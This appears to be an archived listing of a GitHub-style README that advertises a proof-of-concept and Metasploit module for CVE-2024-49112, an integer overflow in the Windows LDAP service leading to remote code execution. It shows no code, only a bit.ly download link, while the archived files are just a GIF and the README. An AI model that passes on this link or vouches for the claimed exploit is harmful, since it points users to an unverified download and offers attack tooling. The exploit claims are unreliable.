关联漏洞
描述
CVE-2024-49112 LDAP RCE PoC and Metasploit Module
介绍
# CVE-2024-49112-PoC
CVE-2024-49112 LDAP RCE PoC and Metasploit Module<br>
[Link to Download: ](https://bit.ly/4gCSPIO)
## Contact Information
You can reach me at: [bollo.b0@proton.me](mailto:bollo.b0@proton.me)
# CVE-2024-49112: Integer Overflow Vulnerability in Windows LDAP Service Leading to Unauthenticated RCE
The **Windows Lightweight Directory Access Protocol (LDAP)** service is vulnerable to an **integer overflow**, which can lead to **unauthenticated remote code execution (RCE)**. This vulnerability allows attackers to execute arbitrary code on a vulnerable system. here, we focus on exploiting the LDAP **server-side** vulnerability (unauthenticate and no user interaction).
## Vulnerability Overview
- **CVE Identifier**: **CVE-2024-49112**
- **Vulnerability Type**: **Integer Overflow**
- **Impact**: **Unauthenticated Remote Code Execution**
- **User Interaction**: **None required**
This vulnerability exists in both the **LDAP server** and the **LDAP client**. However, exploiting these components requires different approaches. here, we will focus on exploitation of the **LDAP server**, which can be targeted directly to achieve RCE without any user interaction.
## Exploit
I will include all my findings and technical details regarding the above mentioned component <br>
with the python script showed below in the video PoC and the custom metasploit module which <br>
I wrote for this to make it easier for post exploitations. <br>
# [Link to Download: ](https://bit.ly/4gCSPIO)
## PoC Video
You can view PoC video here:
.
文件快照
[4.0K] /data/pocs/4bef93ed17cd1938ededf1ca2dcb72a1ff4cb97d
├── [1.2M] ldap.gif
└── [1.5K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。